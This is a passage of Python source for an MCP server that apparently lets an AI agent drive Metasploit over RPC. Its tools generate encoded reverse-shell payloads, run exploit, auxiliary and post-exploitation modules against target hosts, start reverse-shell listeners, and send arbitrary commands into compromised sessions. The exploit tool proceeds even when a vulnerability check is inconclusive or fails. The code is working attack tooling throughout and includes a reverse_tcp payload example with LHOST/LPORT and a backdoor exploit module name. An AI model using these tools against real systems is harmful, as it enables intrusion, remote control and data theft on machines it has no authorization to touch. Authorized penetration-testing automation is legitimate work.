790 | logger.debug(f"Calling client.modules.payloads with {RPC_CALL_TIMEOUT}s timeout...")
791 | payloads = await asyncio.wait_for(
792 | asyncio.to_thread(lambda: client.modules.payloads),
793 | timeout=RPC_CALL_TIMEOUT
794 | )
795 | logger.debug(f"Retrieved {len(payloads)} total payloads from MSF.")
796 | filtered = payloads
797 | if platform:
798 | plat_lower = platform.lower()
799 | # Match platform at the start of the payload path segment or within common paths
800 | filtered = [p for p in filtered if p.lower().startswith(plat_lower + '/') or f"/{plat_lower}/" in p.lower()]
801 | if arch:
802 | arch_lower = arch.lower()
803 | # Match architecture more flexibly (e.g., '/x64/', 'meterpreter')
804 | filtered = [p for p in filtered if f"/{arch_lower}/" in p.lower() or arch_lower in p.lower().split('/')]
805 |
806 | count = len(filtered)
807 | limit = 100
808 | logger.info(f"Found {count} payloads matching filters. Returning max {limit}.")
809 | return filtered[:limit]
810 | except asyncio.TimeoutError:
811 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing payloads from Metasploit server. Server may be slow or unresponsive."
812 | logger.error(error_msg)
813 | return [f"Error: {error_msg}"]
814 | except MsfRpcError as e:
815 | logger.error(f"Metasploit RPC error while listing payloads: {e}")
816 | return [f"Error: Metasploit RPC error: {e}"]
817 | except Exception as e:
818 | logger.exception("Unexpected error listing payloads.")
819 | return [f"Error: Unexpected error listing payloads: {e}"]
820 |
821 | @mcp.tool()
822 | async def generate_payload(
823 | payload_type: str,
824 | format_type: str,
825 | options: Union[Dict[str, Any], str], # Required: e.g., {"LHOST": "1.2.3.4", "LPORT": 4444} or "LHOST=1.2.3.4,LPORT=4444"
826 | encoder: Optional[str] = None,
827 | iterations: int = 0,
828 | bad_chars: str = "",
829 | nop_sled_size: int = 0,
830 | template_path: Optional[str] = None,
831 | keep_template: bool = False,
832 | force_encode: bool = False,
833 | output_filename: Optional[str] = None,
834 | ) -> Dict[str, Any]:
835 | """
836 | Generate a Metasploit payload using the RPC API (payload.generate).
837 | Saves the generated payload to a file on the server if successful.
838 |
839 | Args:
840 | payload_type: Type of payload (e.g., windows/meterpreter/reverse_tcp).
841 | format_type: Output format (raw, exe, python, etc.).
842 | options: Dictionary of required payload options (e.g., {"LHOST": "1.2.3.4", "LPORT": 4444})
843 | or string format "LHOST=1.2.3.4,LPORT=4444". Prefer dict format.
844 | encoder: Optional encoder to use.
845 | iterations: Optional number of encoding iterations.
846 | bad_chars: Optional string of bad characters to avoid (e.g., '\\x00\\x0a\\x0d').
847 | nop_sled_size: Optional size of NOP sled.
848 | template_path: Optional path to an executable template.
849 | keep_template: Keep the template working (requires template_path).
850 | force_encode: Force encoding even if not needed by bad chars.
851 | output_filename: Optional desired filename (without path). If None, a default name is generated.
852 |
853 | Returns:
854 | Dictionary containing status, message, payload size/info, and server-side save path.
855 | """
856 | client = get_msf_client()
857 | logger.info(f"Generating payload '{payload_type}' (Format: {format_type}) via RPC. Options: {options}")
858 |
859 | # Parse options gracefully
860 | try:
861 | parsed_options = _parse_options_gracefully(options)
862 | except ValueError as e:
863 | return {"status": "error", "message": f"Invalid options format: {e}"}
864 |
865 | if not parsed_options:
866 | return {"status": "error", "message": "Payload 'options' dictionary (e.g., LHOST, LPORT) is required."}
867 |
868 | try:
869 | # Get the payload module object
870 | payload = await _get_module_object('payload', payload_type)
871 |
872 | # Set payload-specific required options (like LHOST/LPORT)
873 | await _set_module_options(payload, parsed_options)
874 |
875 | # Set payload generation options in payload.runoptions
876 | # as per the pymetasploit3 documentation
877 | logger.info("Setting payload generation options in payload.runoptions...")
878 |
879 | # Define a function to update an individual runoption
880 | async def update_runoption(key, value):
881 | if value is None:
882 | return
883 | await asyncio.to_thread(lambda k=key, v=value: payload.runoptions.__setitem__(k, v))
884 | logger.debug(f"Set runoption {key}={value}")
885 |
886 | # Set generation options individually
887 | await update_runoption('Format', format_type)
888 | if encoder:
889 | await update_runoption('Encoder', encoder)
890 | if iterations:
891 | await update_runoption('Iterations', iterations)
892 | if bad_chars is not None:
893 | await update_runoption('BadChars', bad_chars)
894 | if nop_sled_size:
895 | await update_runoption('NopSledSize', nop_sled_size)
896 | if template_path:
897 | await update_runoption('Template', template_path)
898 | if keep_template:
899 | await update_runoption('KeepTemplateWorking', keep_template)
900 | if force_encode:
901 | await update_runoption('ForceEncode', force_encode)
902 |
903 | # Generate the payload bytes using payload.payload_generate()
904 | logger.info("Calling payload.payload_generate()...")
905 | raw_payload_bytes = await asyncio.to_thread(lambda: payload.payload_generate())
906 |
907 | if not isinstance(raw_payload_bytes, bytes):
908 | error_msg = f"Payload generation failed. Expected bytes, got {type(raw_payload_bytes)}: {str(raw_payload_bytes)[:200]}"
909 | logger.error(error_msg)
910 | # Try to extract specific error from potential dictionary response
911 | if isinstance(raw_payload_bytes, dict) and raw_payload_bytes.get('error'):
912 | error_msg = raw_payload_bytes.get('error_message', str(raw_payload_bytes))
913 | return {"status": "error", "message": f"Payload generation failed: {error_msg}"}
914 |
915 | payload_size = len(raw_payload_bytes)
916 | logger.info(f"Payload generation successful. Size: {payload_size} bytes.")
917 |
918 | # --- Save Payload ---
919 | # Ensure directory exists
920 | try:
921 | os.makedirs(PAYLOAD_SAVE_DIR, exist_ok=True)
922 | logger.debug(f"Ensured payload directory exists: {PAYLOAD_SAVE_DIR}")
923 | except OSError as e:
924 | logger.error(f"Failed to create payload save directory {PAYLOAD_SAVE_DIR}: {e}")
925 | return {
926 | "status": "error",
927 | "message": f"Payload generated ({payload_size} bytes) but could not create save directory: {e}",
928 | "payload_size": payload_size, "format": format_type
929 | }
930 |
931 | # Determine filename (with basic sanitization)
932 | final_filename = None
933 | if output_filename:
934 | sanitized = re.sub(r'[^a-zA-Z0-9_.\-]', '_', os.path.basename(output_filename)) # Basic sanitize + basename
935 | if sanitized: final_filename = sanitized
936 |
937 | if not final_filename:
938 | timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
939 | safe_payload_type = re.sub(r'[^a-zA-Z0-9_]', '_', payload_type)
940 | safe_format = re.sub(r'[^a-zA-Z0-9_]', '_', format_type)
941 | final_filename = f"payload_{safe_payload_type}_{timestamp}.{safe_format}"
942 |
943 | save_path = os.path.join(PAYLOAD_SAVE_DIR, final_filename)
944 |
945 | # Write payload to file
946 | try:
947 | with open(save_path, "wb") as f:
948 | f.write(raw_payload_bytes)
949 | logger.info(f"Payload saved to {save_path}")
950 | return {
951 | "status": "success",
952 | "message": f"Payload '{payload_type}' generated successfully and saved.",
953 | "payload_size": payload_size,
954 | "format": format_type,
955 | "server_save_path": save_path
956 | }
957 | except IOError as e:
958 | logger.error(f"Failed to write payload to {save_path}: {e}")
959 | return {
960 | "status": "error",
961 | "message": f"Payload generated but failed to save to file: {e}",
962 | "payload_size": payload_size, "format": format_type
963 | }
964 |
965 | except (ValueError, MsfRpcError) as e: # Catches errors from _get_module_object, _set_module_options
966 | error_str = str(e).lower()
967 | logger.error(f"Error generating payload {payload_type}: {e}")
968 | if "invalid payload type" in error_str or "unknown module" in error_str:
969 | return {"status": "error", "message": f"Invalid payload type: {payload_type}"}
970 | elif "missing required option" in error_str or "invalid option" in error_str:
971 | missing = getattr(payload, 'missing_required', []) if 'payload' in locals() else []
972 | return {"status": "error", "message": f"Missing/invalid options for payload {payload_type}: {e}", "missing_required": missing}
973 | return {"status": "error", "message": f"Error generating payload: {e}"}
974 | except AttributeError as e: # Specifically catch if payload_generate is missing
975 | logger.exception(f"AttributeError during payload generation for '{payload_type}': {e}")
976 | if "object has no attribute 'payload_generate'" in str(e):
977 | return {"status": "error", "message": f"The pymetasploit3 payload module doesn't have the payload_generate method. Please check library version/compatibility."}
978 | return {"status": "error", "message": f"An attribute error occurred: {e}"}
979 | except Exception as e:
980 | logger.exception(f"Unexpected error during payload generation for '{payload_type}'.")
981 | return {"status": "error", "message": f"An unexpected server error occurred during payload generation: {e}"}
982 |
983 | @mcp.tool()
984 | async def run_exploit(
985 | module_name: str,
986 | options: Dict[str, Any],
987 | payload_name: Optional[str] = None,
988 | payload_options: Optional[Union[Dict[str, Any], str]] = None,
989 | run_as_job: bool = False,
990 | check_vulnerability: bool = False, # New option
991 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT # Used only if run_as_job=False
992 | ) -> Dict[str, Any]:
993 | """
994 | Run a Metasploit exploit module with specified options. Handles async (job)
995 | and sync (console) execution, and includes session polling for jobs.
996 |
997 | Args:
998 | module_name: Name/path of the exploit module (e.g., 'unix/ftp/vsftpd_234_backdoor').
999 | options: Dictionary of exploit module options (e.g., {'RHOSTS': '192.168.1.1'}).
1000 | payload_name: Name of the payload (e.g., 'linux/x86/meterpreter/reverse_tcp').
1001 | payload_options: Dictionary of payload options (e.g., {'LHOST': '...', 'LPORT': ...})
1002 | or string format "LHOST=1.2.3.4,LPORT=4444". Prefer dict format.
1003 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1004 | check_vulnerability: If True, run module's 'check' action first (if available).
1005 | timeout_seconds: Max time for synchronous run via console.
1006 |
1007 | Returns:
1008 | Dictionary with execution results (job_id, session_id, output) or error details.
1009 | """
1010 | logger.info(f"Request to run exploit '{module_name}'. Job: {run_as_job}, Check: {check_vulnerability}, Payload: {payload_name}")
1011 |
1012 | # Parse payload options gracefully
1013 | try:
1014 | parsed_payload_options = _parse_options_gracefully(payload_options)
1015 | except ValueError as e:
1016 | return {"status": "error", "message": f"Invalid payload_options format: {e}"}
1017 |
1018 | payload_spec = None
1019 | if payload_name:
1020 | payload_spec = {"name": payload_name, "options": parsed_payload_options}
1021 |
1022 | if check_vulnerability:
1023 | logger.info(f"Performing vulnerability check first for {module_name}...")
1024 | try:
1025 | # Use the console helper for 'check' as it provides output
1026 | check_result = await _execute_module_console(
1027 | module_type='exploit',
1028 | module_name=module_name,
1029 | module_options=options,
1030 | command='check', # Use the 'check' command
1031 | timeout=timeout_seconds
1032 | )
1033 | logger.info(f"Vulnerability check result: {check_result.get('status')} - {check_result.get('message')}")
1034 | output = check_result.get("module_output", "").lower()
1035 | # Check output for positive indicators
1036 | is_vulnerable = "appears vulnerable" in output or "is vulnerable" in output or "+ vulnerable" in output
1037 | # Check for negative indicators (more reliable sometimes)
1038 | is_not_vulnerable = "does not appear vulnerable" in output or "is not vulnerable" in output or "target is not vulnerable" in output or "check failed" in output
1039 | if check_result.get('status') == "errror":
1040 | logger.warning(f"Error from metasploit: {check_result}")
1041 | return {"status": "aborted", "message": f"Check indicates a failure: {check_result.get('message')}", "check_output": check_result.get("module_output")}
1042 |
1043 | if is_not_vulnerable or (not is_vulnerable and check_result.get("status") == "error"):
1044 | logger.warning(f"Check indicates target is likely not vulnerable to {module_name}.")
1045 | return {"status": "aborted", "message": f"Check indicates target not vulnerable. Exploit not attempted.", "check_output": check_result.get("module_output")}
1046 | elif not is_vulnerable:
1047 | logger.warning(f"Check result inconclusive for {module_name}. Proceeding with exploit attempt cautiously.")
1048 | else:
1049 | logger.info(f"Check indicates target appears vulnerable to {module_name}. Proceeding.")
1050 | # Optionally return check output here if needed by the agent
1051 |
1052 | except Exception as chk_e:
1053 | logger.warning(f"Vulnerability check failed for {module_name}: {chk_e}. Proceeding with exploit attempt.")
1054 | # Fall through to exploit attempt
1055 |
1056 | # Execute the exploit
1057 | if run_as_job:
1058 | return await _execute_module_rpc(
1059 | module_type='exploit',
1060 | module_name=module_name,
1061 | module_options=options,
1062 | payload_spec=payload_spec
1063 | )
1064 | else:
1065 | return await _execute_module_console(
1066 | module_type='exploit',
1067 | module_name=module_name,
1068 | module_options=options,
1069 | command='exploit',
1070 | payload_spec=payload_spec,
1071 | timeout=timeout_seconds
1072 | )
1073 |
1074 | @mcp.tool()
1075 | async def run_post_module(
1076 | module_name: str,
1077 | session_id: int,
1078 | options: Dict[str, Any] = None,
1079 | run_as_job: bool = False,
1080 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT
1081 | ) -> Dict[str, Any]:
1082 | """
1083 | Run a Metasploit post-exploitation module against a session.
1084 |
1085 | Args:
1086 | module_name: Name/path of the post module (e.g., 'windows/gather/enum_shares').
1087 | session_id: The ID of the target session.
1088 | options: Dictionary of module options. 'SESSION' will be added automatically.
1089 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1090 | timeout_seconds: Max time for synchronous run via console.
1091 |
1092 | Returns:
1093 | Dictionary with execution results or error details.
1094 | """
1095 | logger.info(f"Request to run post module {module_name} on session {session_id}. Job: {run_as_job}")
1096 | module_options = options or {}
1097 | module_options['SESSION'] = session_id # Ensure SESSION is always set
1098 |
1099 | # Add basic session validation before running
1100 | client = get_msf_client()
1101 | try:
1102 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1103 | if str(session_id) not in current_sessions:
1104 | logger.error(f"Session {session_id} not found for post module {module_name}.")
1105 | return {"status": "error", "message": f"Session {session_id} not found.", "module": module_name}
1106 | except MsfRpcError as e:
1107 | logger.error(f"Failed to validate session {session_id} before running post module: {e}")
1108 | # Optionally proceed with caution or return error
1109 | return {"status": "error", "message": f"Error validating session {session_id}: {e}", "module": module_name}
1110 |
1111 |
1112 | if run_as_job:
1113 | return await _execute_module_rpc(
1114 | module_type='post',
1115 | module_name=module_name,
1116 | module_options=module_options
1117 | # No payload for post modules
1118 | )
1119 | else:
1120 | return await _execute_module_console(
1121 | module_type='post',
1122 | module_name=module_name,
1123 | module_options=module_options,
1124 | command='run',
1125 | timeout=timeout_seconds
1126 | )
1127 |
1128 | @mcp.tool()
1129 | async def run_auxiliary_module(
1130 | module_name: str,
1131 | options: Dict[str, Any],
1132 | run_as_job: bool = False, # Default False for scanners often makes sense
1133 | check_target: bool = False, # Add check option similar to exploit
1134 | timeout_seconds: int = LONG_CONSOLE_READ_TIMEOUT
1135 | ) -> Dict[str, Any]:
1136 | """
1137 | Run a Metasploit auxiliary module.
1138 |
1139 | Args:
1140 | module_name: Name/path of the auxiliary module (e.g., 'scanner/ssh/ssh_login').
1141 | options: Dictionary of module options (e.g., {'RHOSTS': ..., 'USERNAME': ...}).
1142 | run_as_job: If False (default), run sync via console. If True, run async via RPC.
1143 | check_target: If True, run module's 'check' action first (if available).
1144 | timeout_seconds: Max time for synchronous run via console.
1145 |
1146 | Returns:
1147 | Dictionary with execution results or error details.
1148 | """
1149 | logger.info(f"Request to run auxiliary module {module_name}. Job: {run_as_job}, Check: {check_target}")
1150 | module_options = options or {}
1151 |
1152 | if check_target:
1153 | logger.info(f"Performing check first for auxiliary module {module_name}...")
1154 | try:
1155 | # Use the console helper for 'check'
1156 | check_result = await _execute_module_console(
1157 | module_type='auxiliary',
1158 | module_name=module_name,
1159 | module_options=options,
1160 | command='check',
1161 | timeout=timeout_seconds
1162 | )
1163 | logger.info(f"Auxiliary check result: {check_result.get('status')} - {check_result.get('message')}")
1164 | output = check_result.get("module_output", "").lower()
1165 | # Generic check for positive outcome (aux check output varies widely)
1166 | is_positive = "host is likely vulnerable" in output or "target appears reachable" in output or "+ check" in output
1167 | is_negative = "host is not vulnerable" in output or "target is not reachable" in output or "check failed" in output
1168 |
1169 | if is_negative or (not is_positive and check_result.get("status") == "error"):
1170 | logger.warning(f"Check indicates target may not be suitable for {module_name}.")
1171 | return {"status": "aborted", "message": f"Check indicates target unsuitable. Module not run.", "check_output": check_result.get("module_output")}
1172 | elif not is_positive:
1173 | logger.warning(f"Check result inconclusive for {module_name}. Proceeding with run.")
1174 | else:
1175 | logger.info(f"Check appears positive for {module_name}. Proceeding.")
1176 |
1177 | except Exception as chk_e:
1178 | logger.warning(f"Check failed for auxiliary {module_name}: {chk_e}. Proceeding with run attempt.")
1179 |
1180 | if run_as_job:
1181 | return await _execute_module_rpc(
1182 | module_type='auxiliary',
1183 | module_name=module_name,
1184 | module_options=module_options
1185 | # No payload for aux modules
1186 | )
1187 | else:
1188 | return await _execute_module_console(
1189 | module_type='auxiliary',
1190 | module_name=module_name,
1191 | module_options=module_options,
1192 | command='run',
1193 | timeout=timeout_seconds
1194 | )
1195 |
1196 | @mcp.tool()
1197 | async def list_active_sessions() -> Dict[str, Any]:
1198 | """List active Metasploit sessions with their details."""
1199 | client = get_msf_client()
1200 | logger.info("Listing active Metasploit sessions.")
1201 | try:
1202 | logger.debug(f"Calling client.sessions.list with {RPC_CALL_TIMEOUT}s timeout...")
1203 | sessions_dict = await asyncio.wait_for(
1204 | asyncio.to_thread(lambda: client.sessions.list),
1205 | timeout=RPC_CALL_TIMEOUT
1206 | )
1207 | if not isinstance(sessions_dict, dict):
1208 | logger.error(f"Expected dict from sessions.list, got {type(sessions_dict)}")
1209 | return {"status": "error", "message": f"Unexpected data type for sessions list: {type(sessions_dict)}"}
1210 |
1211 | logger.info(f"Found {len(sessions_dict)} active sessions.")
1212 | # Ensure keys are strings for consistent JSON
1213 | sessions_dict_str_keys = {str(k): v for k, v in sessions_dict.items()}
1214 | return {"status": "success", "sessions": sessions_dict_str_keys, "count": len(sessions_dict_str_keys)}
1215 | except asyncio.TimeoutError:
1216 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing sessions from Metasploit server. Server may be slow or unresponsive."
1217 | logger.error(error_msg)
1218 | return {"status": "error", "message": error_msg}
1219 | except MsfRpcError as e:
1220 | logger.error(f"Metasploit RPC error while listing sessions: {e}")
1221 | return {"status": "error", "message": f"Metasploit RPC error: {e}"}
1222 | except Exception as e:
1223 | logger.exception("Unexpected error listing sessions.")
1224 | return {"status": "error", "message": f"Unexpected error listing sessions: {e}"}
1225 |
1226 | @mcp.tool()
1227 | async def send_session_command(
1228 | session_id: int,
1229 | command: str,
1230 | timeout_seconds: int = SESSION_COMMAND_TIMEOUT,
1231 | ) -> Dict[str, Any]:
1232 | """
1233 | Send a command to an active Metasploit session (Meterpreter or Shell) and get output.
1234 | Uses session.run_with_output for Meterpreter, and a prompt-aware loop for shells.
1235 | The agent is responsible for parsing the raw output.
1236 |
1237 | In Meterpreter mode, to run a shell command, run `shell` to enter the shell mode first.
1238 | To exit shell mode and return to Meterpreter, run `exit`.
1239 |
1240 | Args:
1241 | session_id: ID of the target session.
1242 | command: Command string to execute in the session.
1243 | timeout_seconds: Maximum time to wait for the command to complete.
1244 |
1245 | Returns:
1246 | Dictionary with status ('success', 'error', 'timeout') and raw command output.
1247 | """
1248 | client = get_msf_client()
1249 | logger.info(f"Sending command to session {session_id}: '{command}'")
1250 | session_id_str = str(session_id)
1251 |
1252 | try:
1253 | # --- Get Session Info and Object ---
1254 | current_sessions = await asyncio.to_thread(lambda: client.sessions.list)
1255 | if session_id_str not in current_sessions:
1256 | logger.error(f"Session {session_id} not found.")
1257 | return {"status": "error", "message": f"Session {session_id} not found."}
1258 |
1259 | session_info = current_sessions[session_id_str]
1260 | session_type = session_info.get('type', 'unknown').lower() if isinstance(session_info, dict) else 'unknown'
1261 | logger.debug(f"Session {session_id} type: {session_type}")
1262 |
1263 | session = await asyncio.to_thread(lambda: client.sessions.session(session_id_str))
1264 | if not session:
1265 | logger.error(f"Failed to get session object for existing session {session_id}.")
1266 | return {"status": "error", "message": f"Error retrieving session {session_id} object."}
1267 |
1268 | # --- Execute Command Based on Type ---
1269 | output = ""
1270 | status = "error" # Default status
1271 | message = "Command execution failed or type unknown."
1272 |
1273 | if session_type == 'meterpreter':
1274 | if session_shell_type.get(session_id_str) is None:
1275 | session_shell_type[session_id_str] = 'meterpreter'
1276 |
1277 | logger.debug(f"Using session.run_with_output for Meterpreter session {session_id}")
1278 | try:
1279 | # Use asyncio.wait_for to handle timeout manually since run_with_output doesn't support timeout parameter
1280 | if command == "shell":
1281 | if session_shell_type[session_id_str] == 'meterpreter':
1282 | output = session.run_with_output(command, end_strs=['created.'])
1283 | session_shell_type[session_id_str] = 'shell'
1284 | session.read() # Clear buffer
1285 | else:
1286 | output = "You are already in shell mode."
1287 | elif command == "exit":
1288 | if session_shell_type[session_id_str] == 'meterpreter':
1289 | output = "You are already in meterpreter mode. No need to exit."
1290 | else:
1291 | session.read() # Clear buffer
1292 | session.detach()
1293 | session_shell_type[session_id_str] = 'meterpreter'
1294 | else:
1295 | output = await asyncio.wait_for(
1296 | asyncio.to_thread(lambda: session.run_with_output(command)),
1297 | timeout=timeout_seconds
1298 | )
1299 | status = "success"
1300 | message = "Meterpreter command executed successfully."
1301 | logger.debug(f"Meterpreter command '{command}' completed.")
1302 | except asyncio.TimeoutError:
1303 | status = "timeout"
1304 | message = f"Meterpreter command timed out after {timeout_seconds} seconds."
1305 | logger.warning(f"Command '{command}' timed out on Meterpreter session {session_id}")
1306 | # Try a final read for potentially partial output
1307 | try:
1308 | output = await asyncio.to_thread(lambda: session.read()) or ""
1309 | except: pass
1310 | except (MsfRpcError, Exception) as run_err:
1311 | logger.error(f"Error during Meterpreter run_with_output for command '{command}': {run_err}")
1312 | message = f"Error executing Meterpreter command: {run_err}"
1313 | # Try a final read
1314 | try:
1315 | output = await asyncio.to_thread(lambda: session.read()) or ""
1316 | except: pass
1317 |
1318 | elif session_type == 'shell':
1319 | logger.debug(f"Using manual read loop for Shell session {session_id}")
1320 | try:
1321 | await asyncio.to_thread(lambda: session.write(command + "\n"))
1322 |
1323 | # If the command is exit, don't wait for output/prompt, assume it worked
1324 | if command.strip().lower() == 'exit':
1325 | logger.info(f"Sent 'exit' to shell session {session_id}, assuming success without reading output.")
1326 | status = "success"
1327 | message = "Exit command sent to shell session."
1328 | output = "(No output expected after exit)"
1329 | # Skip the read loop for exit command
1330 | return {"status": status, "message": message, "output": output}
1331 |
1332 | # Proceed with read loop for non-exit commands
1333 | output_buffer = ""
1334 | start_time = asyncio.get_event_loop().time()
1335 | last_data_time = start_time
1336 | read_interval = 0.1
1337 |
1338 | while True:
1339 | now = asyncio.get_event_loop().time()
1340 | if (now - start_time) > timeout_seconds:
1341 | status = "timeout"
1342 | message = f"Shell command timed out after {timeout_seconds} seconds."
1343 | logger.warning(f"Command '{command}' timed out on Shell session {session_id}")
1344 | break
1345 |
1346 | chunk = await asyncio.to_thread(lambda: session.read())
1347 | if chunk:
1348 | output_buffer += chunk
1349 | last_data_time = now
1350 | # Check if the prompt appears at the end of the current buffer
1351 | if SHELL_PROMPT_RE.search(output_buffer):
1352 | logger.debug(f"Detected shell prompt for command '{command}'.")
1353 | status = "success"
1354 | message = "Shell command executed successfully."
1355 | break
1356 | elif (now - last_data_time) > SESSION_READ_INACTIVITY_TIMEOUT:
1357 | logger.debug(f"Shell inactivity timeout ({SESSION_READ_INACTIVITY_TIMEOUT}s) reached for command '{command}'. Assuming complete.")
1358 | status = "success" # Assume success if inactive after sending command
1359 | message = "Shell command likely completed (inactivity)."
1360 | break
1361 |
1362 | await asyncio.sleep(read_interval)
1363 | output = output_buffer # Assign final buffer to output
1364 | except (MsfRpcError, Exception) as run_err:
1365 | # Special handling for errors after sending 'exit'
1366 | if command.strip().lower() == 'exit':
1367 | logger.warning(f"Error occurred after sending 'exit' to shell {session_id}: {run_err}. This might be expected as session closes.")
1368 | status = "success" # Treat as success
1369 | message = f"Exit command sent, subsequent error likely due to session closing: {run_err}"
1370 | output = "(Error reading after exit, likely expected)"
1371 | else:
1372 | logger.error(f"Error during Shell write/read loop for command '{command}': {run_err}")
1373 | message = f"Error executing Shell command: {run_err}"
1374 | output = output_buffer # Return potentially partial output
1375 |
1376 | else: # Unknown session type
1377 | logger.warning(f"Cannot execute command: Unknown session type '{session_type}' for session {session_id}")
1378 | message = f"Cannot execute command: Unknown session type '{session_type}'."
1379 |
1380 | return {"status": status, "message": message, "output": output}
1381 |
1382 | except MsfRpcError as e:
1383 | if "Session ID is not valid" in str(e):
1384 | logger.error(f"RPC Error: Session {session_id} is invalid: {e}")
1385 | return {"status": "error", "message": f"Session {session_id} is not valid."}
1386 | logger.error(f"MsfRpcError interacting with session {session_id}: {e}")
1387 | return {"status": "error", "message": f"Error interacting with session {session_id}: {e}"}
1388 | except KeyError: # May occur if session disappears between list and access
1389 | logger.error(f"Session {session_id} likely disappeared (KeyError).")
1390 | return {"status": "error", "message": f"Session {session_id} not found or disappeared."}
1391 | except Exception as e:
1392 | logger.exception(f"Unexpected error sending command to session {session_id}.")
1393 | return {"status": "error", "message": f"Unexpected server error sending command: {e}"}
1394 |
1395 |
1396 | # --- Job and Listener Management Tools ---
1397 |
1398 | @mcp.tool()
1399 | async def list_listeners() -> Dict[str, Any]:
1400 | """List all active Metasploit jobs, categorizing exploit/multi/handler jobs."""
1401 | client = get_msf_client()
1402 | logger.info("Listing active listeners/jobs")
1403 | try:
1404 | logger.debug(f"Calling client.jobs.list with {RPC_CALL_TIMEOUT}s timeout...")
1405 | jobs = await asyncio.wait_for(
1406 | asyncio.to_thread(lambda: client.jobs.list),
1407 | timeout=RPC_CALL_TIMEOUT
1408 | )
1409 | if not isinstance(jobs, dict):
1410 | logger.error(f"Unexpected data type for jobs list: {type(jobs)}")
1411 | return {"status": "error", "message": f"Unexpected data type for jobs list: {type(jobs)}"}
1412 |
1413 | logger.info(f"Retrieved {len(jobs)} active jobs from MSF.")
1414 | handlers = {}
1415 | other_jobs = {}
1416 |
1417 | for job_id, job_info in jobs.items():
1418 | job_id_str = str(job_id)
1419 | job_data = { 'job_id': job_id_str, 'name': 'Unknown', 'details': job_info } # Store raw info
1420 |
1421 | is_handler = False
1422 | if isinstance(job_info, dict):
1423 | job_data['name'] = job_info.get('name', 'Unknown Job')
1424 | job_data['start_time'] = job_info.get('start_time') # Keep if useful
1425 | datastore = job_info.get('datastore', {})
1426 | if isinstance(datastore, dict): job_data['datastore'] = datastore # Include datastore
1427 |
1428 | # Primary check: module path in name or info
1429 | job_name_or_info = (job_info.get('name', '') + job_info.get('info', '')).lower()
1430 | if 'exploit/multi/handler' in job_name_or_info:
1431 | is_handler = True
1432 | # Secondary check: presence of typical handler options
1433 | elif 'payload' in datastore or ('lhost' in datastore and 'lport' in datastore):
1434 | is_handler = True
1435 | logger.debug(f"Job {job_id_str} identified as potential handler via datastore options.")
1436 |
1437 | if is_handler:
1438 | logger.debug(f"Categorized job {job_id_str} as a handler.")
1439 | handlers[job_id_str] = job_data
1440 | else:
1441 | logger.debug(f"Categorized job {job_id_str} as non-handler.")
1442 | other_jobs[job_id_str] = job_data
1443 |
1444 | return {
1445 | "status": "success",
1446 | "handlers": handlers,
1447 | "other_jobs": other_jobs,
1448 | "handler_count": len(handlers),
1449 | "other_job_count": len(other_jobs),
1450 | "total_job_count": len(jobs)
1451 | }
1452 |
1453 | except asyncio.TimeoutError:
1454 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing jobs from Metasploit server. Server may be slow or unresponsive."
1455 | logger.error(error_msg)
1456 | return {"status": "error", "message": error_msg}
1457 | except MsfRpcError as e:
1458 | logger.error(f"Metasploit RPC error while listing jobs/handlers: {e}")
1459 | return {"status": "error", "message": f"Metasploit RPC error: {e}"}
1460 | except Exception as e:
1461 | logger.exception("Unexpected error listing jobs/handlers.")
1462 | return {"status": "error", "message": f"Unexpected server error listing jobs: {e}"}
1463 |
1464 | @mcp.tool()
1465 | async def start_listener(
1466 | payload_type: str,
1467 | lhost: str,
1468 | lport: int,
1469 | additional_options: Optional[Union[Dict[str, Any], str]] = None,
1470 | exit_on_session: bool = False # Option to keep listener running
1471 | ) -> Dict[str, Any]:
1472 | """
1473 | Start a new Metasploit handler (exploit/multi/handler) as a background job.
1474 |
1475 | Args:
1476 | payload_type: The payload to handle (e.g., 'windows/meterpreter/reverse_tcp').
1477 | lhost: Listener host address.
1478 | lport: Listener port (1-65535).
1479 | additional_options: Optional dict of additional payload options (e.g., {"LURI": "/path"})
1480 | or string format "LURI=/path,HandlerSSLCert=cert.pem". Prefer dict format.
1481 | exit_on_session: If True, handler exits after first session. If False (default), it keeps running.
1482 |
1483 | Returns:
1484 | Dictionary with handler status (job_id) or error details.
1485 | """
1486 | logger.info(f"Request to start listener for {payload_type} on {lhost}:{lport}. ExitOnSession: {exit_on_session}")
1487 |
1488 | if not (1 <= lport <= 65535):
1489 | return {"status": "error", "message": "Invalid LPORT. Must be between 1 and 65535."}
1490 |
1491 | # Parse additional options gracefully
1492 | try:
1493 | parsed_additional_options = _parse_options_gracefully(additional_options)
1494 | except ValueError as e:
1495 | return {"status": "error", "message": f"Invalid additional_options format: {e}"}
1496 |
1497 | # exploit/multi/handler options
1498 | module_options = {'ExitOnSession': exit_on_session}
1499 | # Payload options (passed within the payload_spec)
1500 | payload_options = parsed_additional_options
1501 | payload_options['LHOST'] = lhost
1502 | payload_options['LPORT'] = lport
1503 |
1504 | payload_spec = {"name": payload_type, "options": payload_options}
1505 |
1506 | # Use the RPC helper to start the handler job
1507 | result = await _execute_module_rpc(
1508 | module_type='exploit',
1509 | module_name='multi/handler', # Use base name for helper
1510 | module_options=module_options,
1511 | payload_spec=payload_spec
1512 | )
1513 |
1514 | # Rename status/message slightly for clarity
1515 | if result.get("status") == "success":
1516 | result["message"] = f"Listener for {payload_type} started as job {result.get('job_id')} on {lhost}:{lport}."
1517 | elif result.get("status") == "warning": # e.g., job started but polling failed (not applicable here but handle)
1518 | result["message"] = f"Listener job {result.get('job_id')} started, but encountered issues: {result.get('message')}"
1519 | else: # Error case
1520 | result["message"] = f"Failed to start listener: {result.get('message')}"
1521 |
1522 | return result
1523 |
1524 | @mcp.tool()
1525 | async def stop_job(job_id: int) -> Dict[str, Any]:
1526 | """
1527 | Stop a running Metasploit job (handler or other). Verifies disappearance.
1528 | """
1529 | client = get_msf_client()
1530 | logger.info(f"Attempting to stop job {job_id}")
1531 | job_id_str = str(job_id)
1532 | job_name = "Unknown"
1533 |
1534 | try:
1535 | # Check if job exists and get name
1536 | jobs_before = await asyncio.to_thread(lambda: client.jobs.list)
1537 | if job_id_str not in jobs_before:
1538 | logger.error(f"Job {job_id} not found, cannot stop.")
